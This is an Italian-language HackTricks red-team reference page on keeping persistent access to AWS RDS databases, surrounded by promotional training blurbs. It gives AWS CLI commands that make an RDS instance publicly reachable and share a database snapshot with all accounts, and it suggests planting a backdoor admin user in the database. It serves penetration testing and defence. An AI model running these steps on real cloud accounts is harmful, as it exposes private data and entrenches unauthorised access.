AWS - RDS Persistence
Reading time: 2 minutes
tip
Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Impara e pratica il hacking Azure:
HackTricks Training Azure Red Team Expert (AzRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos su github.
RDS
Per ulteriori informazioni controlla:
AWS - Relational Database (RDS) Enum
Rendi l'istanza accessibile pubblicamente: rds:ModifyDBInstance
Un attaccante con questo permesso può modificare un'istanza RDS esistente per abilitare l'accesso pubblico.
aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately
Crea un utente admin all'interno del DB
Un attaccante potrebbe semplicemente creare un utente all'interno del DB così anche se la password dell'utente master viene modificata, non perde l'accesso al database.
Rendi pubblico lo snapshot
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
tip
Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Impara e pratica il hacking Azure:
HackTricks Training Azure Red Team Expert (AzRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos su github.